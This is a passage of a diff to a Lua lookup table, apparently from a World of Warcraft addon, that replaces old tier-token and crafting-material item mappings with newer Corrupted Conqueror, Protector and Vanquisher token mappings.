77027, -- Blackfang Battleweave Spaulders }, - -- Liadrin's Gauntlets of Triumph - ["48618"] = { - 47557, -- Regalia of the Grand Conqueror + -- Leggings of the Corrupted Vanquisher + ["78171"] = { + 76214, -- Time Lord's Leggings + 76751, -- Deep Earth Legwraps + 76977, -- Necrotic Boneplate Greaves + 77011, -- Necrotic Boneplate Legguards + 77016, -- Deep Earth Legguards + 77020, -- Deep Earth Leggings + 77026, -- Blackfang Battleweave Legguards }, - -- Liadrin's Helm of Triumph - ["48619"] = { - 47557, -- Regalia of the Grand Conqueror + -- Crown of the Corrupted Vanquisher + ["78172"] = { + 76213, -- Time Lord's Hood + 76750, -- Deep Earth Helm + 76976, -- Necrotic Boneplate Helmet + 77010, -- Necrotic Boneplate Faceguard + 77015, -- Deep Earth Headpiece + 77019, -- Deep Earth Cover + 77025, -- Blackfang Battleweave Helmet }, - -- Liadrin's Legplates of Triumph - ["48620"] = { - 47557, -- Regalia of the Grand Conqueror + -- Gauntlets of the Corrupted Vanquisher + ["78173"] = { + 76212, -- Time Lord's Gloves + 76749, -- Deep Earth Handwraps + 76975, -- Necrotic Boneplate Gauntlets + 77009, -- Necrotic Boneplate Handguards + 77014, -- Deep Earth Grips + 77018, -- Deep Earth Gloves + 77024, -- Blackfang Battleweave Gloves }, - -- Liadrin's Shoulderplates of Triumph - ["48621"] = { - 47557, -- Regalia of the Grand Conqueror + -- Chest of the Corrupted Vanquisher + ["78174"] = { + 76215, -- Time Lord's Robes + 76752, -- Deep Earth Robes + 76974, -- Necrotic Boneplate Breastplate + 77008, -- Necrotic Boneplate Chestguard + 77013, -- Deep Earth Raiment + 77021, -- Deep Earth Vestment + 77023, -- Blackfang Battleweave Tunic }, - -- Liadrin's Shoulderplates of Triumph - ["48622"] = { - 47242, -- Trophy of the Crusade + -- Shoulders of the Corrupted Protector + ["78175"] = { + 76760, -- Spiritwalker's Mantle + 76987, -- Colossal Dragonplate Pauldrons + 76992, -- Colossal Dragonplate Shoulderguards + 77032, -- Wyrmstalker's Spaulders + 77035, -- Spiritwalker's Shoulderwraps + 77044, -- Spiritwalker's Spaulders }, - -- Liadrin's Legplates of Triumph - ["48623"] = { - 47242, -- Trophy of the Crusade + -- Leggings of the Corrupted Protector + ["78176"] = { + 76759, -- Spiritwalker's Legwraps + 76986, -- Colossal Dragonplate Legplates + 76991, -- Colossal Dragonplate Legguards + 77031, -- Wyrmstalker's Legguards + 77036, -- Spiritwalker's Kilt + 77043, -- Spiritwalker's Legguards }, - -- Liadrin's Helm of Triumph - ["48624"] = { - 47242, -- Trophy of the Crusade + -- Crown of the Corrupted Protector + ["78177"] = { + 76758, -- Spiritwalker's Faceguard + 76983, -- Colossal Dragonplate Helmet + 76990, -- Colossal Dragonplate Faceguard + 77030, -- Wyrmstalker's Headguard + 77037, -- Spiritwalker's Headpiece + 77042, -- Spiritwalker's Helmet }, - -- Liadrin's Gauntlets of Triumph - ["48625"] = { - 47242, -- Trophy of the Crusade + -- Gauntlets of the Corrupted Protector + ["78178"] = { + 76757, -- Spiritwalker's Handwraps + 76985, -- Colossal Dragonplate Gauntlets + 76989, -- Colossal Dragonplate Handguards + 77029, -- Wyrmstalker's Gloves + 77038, -- Spiritwalker's Gloves + 77041, -- Spiritwalker's Grips }, - -- Liadrin's Battleplate of Triumph - ["48626"] = { - 47242, -- Trophy of the Crusade + -- Chest of the Corrupted Protector + ["78179"] = { + 76756, -- Spiritwalker's Tunic + 76984, -- Colossal Dragonplate Battleplate + 76988, -- Colossal Dragonplate Chestguard + 77028, -- Wyrmstalker's Tunic + 77039, -- Spiritwalker's Hauberk + 77040, -- Spiritwalker's Cuirass }, - -- Turalyon's Shoulderguards of Triumph - ["48637"] = { - 47242, -- Trophy of the Crusade + -- Shoulders of the Corrupted Conqueror + ["78180"] = { + 76339, -- Mantle of the Faceless Shroud + 76344, -- Mantle of Dying Light + 76361, -- Mantle of Dying Light + 76769, -- Mantle of Radiant Glory + 76878, -- Pauldrons of Radiant Glory + 77007, -- Shoulderguards of Radiant Glory }, - -- Turalyon's Legguards of Triumph - ["48638"] = { - 47242, -- Trophy of the Crusade + -- Leggings of the Corrupted Conqueror + ["78181"] = { + 76341, -- Leggings of the Faceless Shroud + 76346, -- Leggings of Dying Light + 76359, -- Legwraps of Dying Light + 76768, -- Greaves of Radiant Glory + 76877, -- Legplates of Radiant Glory + 77006, -- Legguards of Radiant Glory }, - -- Turalyon's Faceguard of Triumph - ["48639"] = { - 47242, -- Trophy of the Crusade + -- Crown of the Corrupted Conqueror + ["78182"] = { + 76342, -- Hood of the Faceless Shroud + 76347, -- Hood of Dying Light + 76358, -- Cowl of Dying Light + 76767, -- Headguard of Radiant Glory + 76876, -- Helmet of Radiant Glory + 77005, -- Faceguard of Radiant Glory }, - -- Turalyon's Handguards of Triumph - ["48640"] = { - 47242, -- Trophy of the Crusade + -- Gauntlets of the Corrupted Conqueror + ["78183"] = { + 76343, -- Gloves of the Faceless Shroud + 76348, -- Gloves of Dying Light + 76357, -- Handwraps of Dying Light + 76766, -- Gloves of Radiant Glory + 76875, -- Gauntlets of Radiant Glory + 77004, -- Handguards of Radiant Glory }, - -- Turalyon's Breastplate of Triumph - ["48641"] = { - 47242, -- Trophy of the Crusade + -- Chest of the Corrupted Conqueror + ["78184"] = { + 76340, -- Robes of the Faceless Shroud + 76345, -- Robes of Dying Light + 76360, -- Robes of Dying Light + 76765, -- Breastplate of Radiant Glory + 76874, -- Battleplate of Radiant Glory + 77003, -- Chestguard of Radiant Glory }, - -- Turalyon's Breastplate of Triumph - ["48642"] = { - 47557, -- Regalia of the Grand Conqueror + -- Colossal Dragonplate Battleplate + ["78657"] = { + 78848, -- Chest of the Corrupted Protector }, - -- Turalyon's Handguards of Triumph - ["48643"] = { - 47557, -- Regalia of the Grand Conqueror + -- Colossal Dragonplate Chestguard + ["78658"] = { + 78848, -- Chest of the Corrupted Protector }, - -- Turalyon's Faceguard of Triumph - ["48644"] = { - 47557, -- Regalia of the Grand Conqueror + -- Necrotic Boneplate Breastplate + ["78659"] = { + 78849, -- Chest of the Corrupted Vanquisher }, - -- Turalyon's Legguards of Triumph - ["48645"] = { - 47557, -- Regalia of the Grand Conqueror + -- Deep Earth Robes + ["78660"] = { + 78849, -- Chest of the Corrupted Vanquisher }, - -- Turalyon's Shoulderguards of Triumph - ["48646"] = { - 47557, -- Regalia of the Grand Conqueror + -- Wyrmstalker's Tunic + ["78661"] = { + 78848, -- Chest of the Corrupted Protector }, - -- Liadrin's Shoulderguards of Triumph - ["48647"] = { - 47557, -- Regalia of the Grand Conqueror + -- Deep Earth Vestment + ["78662"] = { + 78849, -- Chest of the Corrupted Vanquisher }, - -- Liadrin's Legguards of Triumph - ["48648"] = { - 47557, -- Regalia of the Grand Conqueror + -- Necrotic Boneplate Chestguard + ["78663"] = { + 78849, -- Chest of the Corrupted Vanquisher }, - -- Liadrin's Faceguard of Triumph - ["48649"] = { - 47557, -- Regalia of the Grand Conqueror + -- Blackfang Battleweave Tunic + ["78664"] = { + 78849, -- Chest of the Corrupted Vanquisher }, - -- Liadrin's Handguards of Triumph - ["48650"] = { - 47557, -- Regalia of the Grand Conqueror + -- Deep Earth Raiment + ["78665"] = { + 78849, -- Chest of the Corrupted Vanquisher }, - -- Liadrin's Breastplate of Triumph - ["48651"] = { - 47557, -- Regalia of the Grand Conqueror + -- Spiritwalker's Gloves + ["78666"] = { + 78854, -- Gauntlets of the Corrupted Protector }, - -- Liadrin's Breastplate of Triumph - ["48657"] = { - 47242, -- Trophy of the Crusade + -- Spiritwalker's Grips + ["78667"] = { + 78854, -- Gauntlets of the Corrupted Protector }, - -- Liadrin's Handguards of Triumph - ["48658"] = { - 47242, -- Trophy of the Crusade + -- Colossal Dragonplate Gauntlets + ["78668"] = { + 78854, -- Gauntlets of the Corrupted Protector }, - -- Liadrin's Faceguard of Triumph - ["48659"] = { - 47242, -- Trophy of the Crusade + -- Colossal Dragonplate Handguards + ["78669"] = { + 78854, -- Gauntlets of the Corrupted Protector }, - -- Liadrin's Legguards of Triumph - ["48660"] = { - 47242, -- Trophy of the Crusade + -- Necrotic Boneplate Gauntlets + ["78670"] = { + 78855, -- Gauntlets of the Corrupted Vanquisher }, - -- Liadrin's Shoulderguards of Triumph - ["48661"] = { - 47242, -- Trophy of the Crusade + -- Time Lord's Gloves + ["78671"] = { + 78855, -- Gauntlets of the Corrupted Vanquisher }, - -- Shadowmourne - ["49623"] = { - 50274, -- Shadowfrost Shard + -- Spiritwalker's Handwraps + ["78672"] = { + 78854, -- Gauntlets of the Corrupted Protector }, - -- Deathfrost Boots - ["49890"] = { - 49908, -- Primordial Saronite + -- Gloves of Radiant Glory + ["78673"] = { + 78853, -- Gauntlets of the Corrupted Conqueror }, - -- Leggings of Woven Death - ["49891"] = { - 49908, -- Primordial Saronite + -- Wyrmstalker's Gloves + ["78674"] = { + 78854, -- Gauntlets of the Corrupted Protector }, - -- Lightweave Leggings - ["49892"] = { - 49908, -- Primordial Saronite + -- Gauntlets of Radiant Glory + ["78675"] = { + 78853, -- Gauntlets of the Corrupted Conqueror }, - -- Sandals of Consecration - ["49893"] = { - 49908, -- Primordial Saronite + -- Deep Earth Gloves + ["78676"] = { + 78855, -- Gauntlets of the Corrupted Vanquisher }, - -- Blessed Cenarion Boots - ["49894"] = { - 49908, -- Primordial Saronite + -- Handguards of Radiant Glory + ["78677"] = { + 78853, -- Gauntlets of the Corrupted Conqueror }, - -- Footpads of Impending Death - ["49895"] = { - 49908, -- Primordial Saronite + -- Necrotic Boneplate Handguards + ["78678"] = { + 78855, -- Gauntlets of the Corrupted Vanquisher }, - -- Earthsoul Boots - ["49896"] = { - 49908, -- Primordial Saronite + -- Blackfang Battleweave Gloves + ["78679"] = { + 78855, -- Gauntlets of the Corrupted Vanquisher }, - -- Rock-Steady Treads - ["49897"] = { - 49908, -- Primordial Saronite + -- Deep Earth Handwraps + ["78680"] = { + 78855, -- Gauntlets of the Corrupted Vanquisher }, - -- Legwraps of Unleashed Nature - ["49898"] = { - 49908, -- Primordial Saronite + -- Gloves of the Faceless Shroud + ["78681"] = { + 78853, -- Gauntlets of the Corrupted Conqueror }, - -- Bladeborn Leggings - ["49899"] = { - 49908, -- Primordial Saronite + -- Gloves of Dying Light + ["78682"] = { + 78853, -- Gauntlets of the Corrupted Conqueror }, - -- Lightning-Infused Leggings - ["49900"] = { - 49908, -- Primordial Saronite + -- Handwraps of Dying Light + ["78683"] = { + 78853, -- Gauntlets of the Corrupted Conqueror }, - -- Draconic Bonesplinter Legguards - ["49901"] = { - 49908, -- Primordial Saronite + -- Deep Earth Grips + ["78684"] = { + 78855, -- Gauntlets of the Corrupted Vanquisher }, - -- Puresteel Legplates - ["49902"] = { - 49908, -- Primordial Saronite + -- Spiritwalker's Headpiece + ["78685"] = { + 78851, -- Crown of the Corrupted Protector }, - -- Legplates of Painful Death - ["49903"] = { - 49908, -- Primordial Saronite + -- Spiritwalker's Helmet + ["78686"] = { + 78851, -- Crown of the Corrupted Protector }, - -- Pillars of Might - ["49904"] = { - 49908, -- Primordial Saronite + -- Necrotic Boneplate Helmet + ["78687"] = { + 78852, -- Crown of the Corrupted Vanquisher }, - -- Protectors of Life - ["49905"] = { - 49908, -- Primordial Saronite + -- Colossal Dragonplate Helmet + ["78688"] = { + 78851, -- Crown of the Corrupted Protector }, - -- Hellfrozen Bonegrinders - ["49906"] = { - 49908, -- Primordial Saronite + -- Colossal Dragonplate Faceguard + ["78689"] = { + 78851, -- Crown of the Corrupted Protector }, - -- Boots of Kingly Upheaval - ["49907"] = { - 49908, -- Primordial Saronite + -- Deep Earth Helm + ["78690"] = { + 78852, -- Crown of the Corrupted Vanquisher }, - -- Primordial Saronite - ["49908"] = { - 49890, -- Deathfrost Boots - 49891, -- Leggings of Woven Death - 49892, -- Lightweave Leggings - 49893, -- Sandals of Consecration - 49894, -- Blessed Cenarion Boots - 49895, -- Footpads of Impending Death - 49896, -- Earthsoul Boots - 49897, -- Rock-Steady Treads - 49898, -- Legwraps of Unleashed Nature - 49899, -- Bladeborn Leggings - 49900, -- Lightning-Infused Leggings - 49901, -- Draconic Bonesplinter Legguards - 49902, -- Puresteel Legplates - 49903, -- Legplates of Painful Death - 49904, -- Pillars of Might - 49905, -- Protectors of Life - 49906, -- Hellfrozen Bonegrinders - 49907, -- Boots of Kingly Upheaval - 49953, -- Pattern: Leggings of Woven Death - 49954, -- Pattern: Deathfrost Boots - 49955, -- Pattern: Lightweave Leggings - 49956, -- Pattern: Sandals of Consecration - 49957, -- Pattern: Legwraps of Unleashed Nature - 49958, -- Pattern: Blessed Cenarion Boots - 49959, -- Pattern: Bladeborn Leggings - 49961, -- Pattern: Footpads of Impending Death - 49962, -- Pattern: Lightning-Infused Leggings - 49963, -- Pattern: Earthsoul Boots - 49965, -- Pattern: Draconic Bonesplinter Legguards - 49966, -- Pattern: Rock-Steady Treads - 49969, -- Plans: Puresteel Legplates - 49970, -- Plans: Protectors of Life - 49971, -- Plans: Legplates of Painful Death - 49972, -- Plans: Hellfrozen Bonegrinders - 49973, -- Plans: Pillars of Might - 49974, -- Plans: Boots of Kingly Upheaval + -- Spiritwalker's Faceguard + ["78691"] = { + 78851, -- Crown of the Corrupted Protector }, - -- Pattern: Leggings of Woven Death - ["49953"] = { - 49908, -- Primordial Saronite + -- Headguard of Radiant Glory + ["78692"] = { + 78850, -- Crown of the Corrupted Conqueror }, - -- Pattern: Deathfrost Boots - ["49954"] = { - 49908, -- Primordial Saronite + -- Helmet of Radiant Glory + ["78693"] = { + 78850, -- Crown of the Corrupted Conqueror }, - -- Pattern: Lightweave Leggings - ["49955"] = { - 49908, -- Primordial Saronite + -- Deep Earth Headpiece + ["78694"] = { + 78852, -- Crown of the Corrupted Vanquisher }, - -- Pattern: Sandals of Consecration - ["49956"] = { - 49908, -- Primordial Saronite + -- Faceguard of Radiant Glory + ["78695"] = { + 78850, -- Crown of the Corrupted Conqueror }, - -- Pattern: Legwraps of Unleashed Nature - ["49957"] = { - 49908, -- Primordial Saronite + -- Deep Earth Cover + ["78696"] = { + 78852, -- Crown of the Corrupted Vanquisher }, - -- Pattern: Blessed Cenarion Boots - ["49958"] = { - 49908, -- Primordial Saronite + -- Necrotic Boneplate Faceguard + ["78697"] = { + 78852, -- Crown of the Corrupted Vanquisher }, - -- Pattern: Bladeborn Leggings - ["49959"] = { - 49908, -- Primordial Saronite + -- Wyrmstalker's Headguard + ["78698"] = { + 78851, -- Crown of the Corrupted Protector }, - -- Pattern: Footpads of Impending Death - ["49961"] = { - 49908, -- Primordial Saronite + -- Blackfang Battleweave Helmet + ["78699"] = { + 78852, -- Crown of the Corrupted Vanquisher }, - -- Pattern: Lightning-Infused Leggings - ["49962"] = { - 49908, -- Primordial Saronite + -- Cowl of Dying Light + ["78700"] = { + 78850, -- Crown of the Corrupted Conqueror }, - -- Pattern: Earthsoul Boots - ["49963"] = { - 49908, -- Primordial Saronite + -- Time Lord's Hood + ["78701"] = { + 78852, -- Crown of the Corrupted Vanquisher }, - -- Pattern: Draconic Bonesplinter Legguards - ["49965"] = { - 49908, -- Primordial Saronite + -- Hood of the Faceless Shroud + ["78702"] = { + 78850, -- Crown of the Corrupted Conqueror }, - -- Pattern: Rock-Steady Treads - ["49966"] = { - 49908, -- Primordial Saronite + -- Hood of Dying Light + ["78703"] = { + 78850, -- Crown of the Corrupted Conqueror }, - -- Plans: Puresteel Legplates - ["49969"] = { - 49908, -- Primordial Saronite + -- Spiritwalker's Legguards + ["78704"] = { + 78857, -- Leggings of the Corrupted Protector }, - -- Plans: Protectors of Life - ["49970"] = { - 49908, -- Primordial Saronite + -- Colossal Dragonplate Legguards + ["78705"] = { + 78857, -- Leggings of the Corrupted Protector }, - -- Plans: Legplates of Painful Death - ["49971"] = { - 49908, -- Primordial Saronite + -- Colossal Dragonplate Legplates + ["78706"] = { + 78857, -- Leggings of the Corrupted Protector }, - -- Plans: Hellfrozen Bonegrinders - ["49972"] = { - 49908, -- Primordial Saronite + -- Necrotic Boneplate Greaves + ["78707"] = { + 78858, -- Leggings of the Corrupted Vanquisher }, - -- Plans: Pillars of Might - ["49973"] = { - 49908, -- Primordial Saronite + -- Blackfang Battleweave Legguards + ["78708"] = { + 78858, -- Leggings of the Corrupted Vanquisher }, - -- Plans: Boots of Kingly Upheaval - ["49974"] = { - 49908, -- Primordial Saronite + -- Wyrmstalker's Legguards + ["78709"] = { + 78857, -- Leggings of the Corrupted Protector }, - -- Shadowfrost Shard - ["50274"] = { - 49623, -- Shadowmourne + -- Deep Earth Legwraps + ["78710"] = { + 78858, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Scourgelord Shoulderplates - ["51125"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Spiritwalker's Kilt + ["78711"] = { + 78857, -- Leggings of the Corrupted Protector }, - -- Sanctified Scourgelord Legplates - ["51126"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Legplates of Radiant Glory + ["78712"] = { + 78856, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Scourgelord Helmet - ["51127"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Deep Earth Legguards + ["78713"] = { + 78858, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Scourgelord Gauntlets - ["51128"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Deep Earth Leggings + ["78714"] = { + 78858, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Scourgelord Battleplate - ["51129"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Legguards of Radiant Glory + ["78715"] = { + 78856, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Scourgelord Pauldrons - ["51130"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Necrotic Boneplate Legguards + ["78716"] = { + 78858, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Scourgelord Legguards - ["51131"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Greaves of Radiant Glory + ["78717"] = { + 78856, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Scourgelord Handguards - ["51132"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Spiritwalker's Legwraps + ["78718"] = { + 78857, -- Leggings of the Corrupted Protector }, - -- Sanctified Scourgelord Faceguard - ["51133"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Legwraps of Dying Light + ["78719"] = { + 78856, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Scourgelord Chestguard - ["51134"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Time Lord's Leggings + ["78720"] = { + 78858, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Lasherweave Pauldrons - ["51135"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Leggings of the Faceless Shroud + ["78721"] = { + 78856, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Lasherweave Legplates - ["51136"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Leggings of Dying Light + ["78722"] = { + 78856, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Lasherweave Helmet - ["51137"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Spiritwalker's Hauberk + ["78723"] = { + 78848, -- Chest of the Corrupted Protector }, - -- Sanctified Lasherweave Gauntlets - ["51138"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Spiritwalker's Cuirass + ["78724"] = { + 78848, -- Chest of the Corrupted Protector }, - -- Sanctified Lasherweave Robes - ["51139"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Spiritwalker's Tunic + ["78725"] = { + 78848, -- Chest of the Corrupted Protector }, - -- Sanctified Lasherweave Shoulderpads - ["51140"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Breastplate of Radiant Glory + ["78726"] = { + 78847, -- Chest of the Corrupted Conqueror }, - -- Sanctified Lasherweave Raiment - ["51141"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Battleplate of Radiant Glory + ["78727"] = { + 78847, -- Chest of the Corrupted Conqueror }, - -- Sanctified Lasherweave Legguards - ["51142"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Robes of Dying Light + ["78728"] = { + 78847, -- Chest of the Corrupted Conqueror }, - -- Sanctified Lasherweave Headguard - ["51143"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Time Lord's Robes + ["78729"] = { + 78849, -- Chest of the Corrupted Vanquisher }, - -- Sanctified Lasherweave Handgrips - ["51144"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Robes of the Faceless Shroud + ["78730"] = { + 78847, -- Chest of the Corrupted Conqueror }, - -- Sanctified Lasherweave Vestment - ["51145"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Robes of Dying Light + ["78731"] = { + 78847, -- Chest of the Corrupted Conqueror + }, + -- Chestguard of Radiant Glory + ["78732"] = { + 78847, -- Chest of the Corrupted Conqueror + }, + -- Spiritwalker's Spaulders + ["78733"] = { + 78860, -- Shoulders of the Corrupted Protector + }, + -- Colossal Dragonplate Shoulderguards + ["78734"] = { + 78860, -- Shoulders of the Corrupted Protector + }, + -- Colossal Dragonplate Pauldrons + ["78735"] = { + 78860, -- Shoulders of the Corrupted Protector }, - -- Sanctified Lasherweave Trousers - ["51146"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Necrotic Boneplate Pauldrons + ["78736"] = { + 78861, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Lasherweave Mantle - ["51147"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Wyrmstalker's Spaulders + ["78737"] = { + 78860, -- Shoulders of the Corrupted Protector }, - -- Sanctified Lasherweave Gloves - ["51148"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Blackfang Battleweave Spaulders + ["78738"] = { + 78861, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Lasherweave Cover - ["51149"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Spiritwalker's Mantle + ["78739"] = { + 78860, -- Shoulders of the Corrupted Protector }, - -- Sanctified Ahn'Kahar Blood Hunter's Tunic - ["51150"] = { - 52026, -- Protector's Mark of Sanctification + -- Deep Earth Mantle + ["78740"] = { + 78861, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Ahn'Kahar Blood Hunter's Spaulders - ["51151"] = { - 52026, -- Protector's Mark of Sanctification + -- Spiritwalker's Shoulderwraps + ["78741"] = { + 78860, -- Shoulders of the Corrupted Protector }, - -- Sanctified Ahn'Kahar Blood Hunter's Legguards - ["51152"] = { - 52026, -- Protector's Mark of Sanctification + -- Pauldrons of Radiant Glory + ["78742"] = { + 78859, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Ahn'Kahar Blood Hunter's Headpiece - ["51153"] = { - 52026, -- Protector's Mark of Sanctification + -- Deep Earth Spaulders + ["78743"] = { + 78861, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Ahn'Kahar Blood Hunter's Handguards - ["51154"] = { - 52026, -- Protector's Mark of Sanctification + -- Deep Earth Shoulderwraps + ["78744"] = { + 78861, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Bloodmage Shoulderpads - ["51155"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Shoulderguards of Radiant Glory + ["78745"] = { + 78859, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Bloodmage Robe - ["51156"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Mantle of Radiant Glory + ["78746"] = { + 78859, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Bloodmage Leggings - ["51157"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Mantle of Dying Light + ["78747"] = { + 78859, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Bloodmage Hood - ["51158"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Time Lord's Mantle + ["78748"] = { + 78861, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Bloodmage Gloves - ["51159"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Mantle of the Faceless Shroud + ["78749"] = { + 78859, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Lightsworn Shoulderplates - ["51160"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Mantle of Dying Light + ["78750"] = { + 78859, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Lightsworn Legplates - ["51161"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Necrotic Boneplate Shoulderguards + ["78751"] = { + 78861, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Lightsworn Helmet - ["51162"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Colossal Dragonplate Battleplate + ["78752"] = { + 78864, -- Chest of the Corrupted Protector }, - -- Sanctified Lightsworn Gauntlets - ["51163"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Colossal Dragonplate Chestguard + ["78753"] = { + 78864, -- Chest of the Corrupted Protector }, - -- Sanctified Lightsworn Battleplate - ["51164"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Necrotic Boneplate Breastplate + ["78754"] = { + 78862, -- Chest of the Corrupted Vanquisher }, - -- Sanctified Lightsworn Tunic - ["51165"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Deep Earth Robes + ["78755"] = { + 78862, -- Chest of the Corrupted Vanquisher }, - -- Sanctified Lightsworn Spaulders - ["51166"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Wyrmstalker's Tunic + ["78756"] = { + 78864, -- Chest of the Corrupted Protector }, - -- Sanctified Lightsworn Headpiece - ["51167"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Deep Earth Vestment + ["78757"] = { + 78862, -- Chest of the Corrupted Vanquisher }, - -- Sanctified Lightsworn Greaves - ["51168"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Necrotic Boneplate Chestguard + ["78758"] = { + 78862, -- Chest of the Corrupted Vanquisher }, - -- Sanctified Lightsworn Gloves - ["51169"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Blackfang Battleweave Tunic + ["78759"] = { + 78862, -- Chest of the Corrupted Vanquisher }, - -- Sanctified Lightsworn Shoulderguards - ["51170"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Deep Earth Raiment + ["78760"] = { + 78862, -- Chest of the Corrupted Vanquisher }, - -- Sanctified Lightsworn Legguards - ["51171"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Spiritwalker's Gloves + ["78761"] = { + 78867, -- Gauntlets of the Corrupted Protector }, - -- Sanctified Lightsworn Handguards - ["51172"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Spiritwalker's Grips + ["78762"] = { + 78867, -- Gauntlets of the Corrupted Protector }, - -- Sanctified Lightsworn Faceguard - ["51173"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Colossal Dragonplate Gauntlets + ["78763"] = { + 78867, -- Gauntlets of the Corrupted Protector }, - -- Sanctified Lightsworn Chestguard - ["51174"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Colossal Dragonplate Handguards + ["78764"] = { + 78867, -- Gauntlets of the Corrupted Protector }, - -- Sanctified Crimson Acolyte Shoulderpads - ["51175"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Necrotic Boneplate Gauntlets + ["78765"] = { + 78865, -- Gauntlets of the Corrupted Vanquisher }, - -- Sanctified Crimson Acolyte Robe - ["51176"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Time Lord's Gloves + ["78766"] = { + 78865, -- Gauntlets of the Corrupted Vanquisher }, - -- Sanctified Crimson Acolyte Leggings - ["51177"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Spiritwalker's Handwraps + ["78767"] = { + 78867, -- Gauntlets of the Corrupted Protector }, - -- Sanctified Crimson Acolyte Hood - ["51178"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Gloves of Radiant Glory + ["78768"] = { + 78866, -- Gauntlets of the Corrupted Conqueror }, - -- Sanctified Crimson Acolyte Gloves - ["51179"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Wyrmstalker's Gloves + ["78769"] = { + 78867, -- Gauntlets of the Corrupted Protector }, - -- Sanctified Crimson Acolyte Raiments - ["51180"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Gauntlets of Radiant Glory + ["78770"] = { + 78866, -- Gauntlets of the Corrupted Conqueror }, - -- Sanctified Crimson Acolyte Pants - ["51181"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Deep Earth Gloves + ["78771"] = { + 78865, -- Gauntlets of the Corrupted Vanquisher }, - -- Sanctified Crimson Acolyte Mantle - ["51182"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Handguards of Radiant Glory + ["78772"] = { + 78866, -- Gauntlets of the Corrupted Conqueror }, - -- Sanctified Crimson Acolyte Handwraps - ["51183"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Necrotic Boneplate Handguards + ["78773"] = { + 78865, -- Gauntlets of the Corrupted Vanquisher }, - -- Sanctified Crimson Acolyte Cowl - ["51184"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Blackfang Battleweave Gloves + ["78774"] = { + 78865, -- Gauntlets of the Corrupted Vanquisher }, - -- Sanctified Shadowblade Pauldrons - ["51185"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Deep Earth Handwraps + ["78775"] = { + 78865, -- Gauntlets of the Corrupted Vanquisher }, - -- Sanctified Shadowblade Legplates - ["51186"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Gloves of the Faceless Shroud + ["78776"] = { + 78866, -- Gauntlets of the Corrupted Conqueror }, - -- Sanctified Shadowblade Helmet - ["51187"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Gloves of Dying Light + ["78777"] = { + 78866, -- Gauntlets of the Corrupted Conqueror + }, + -- 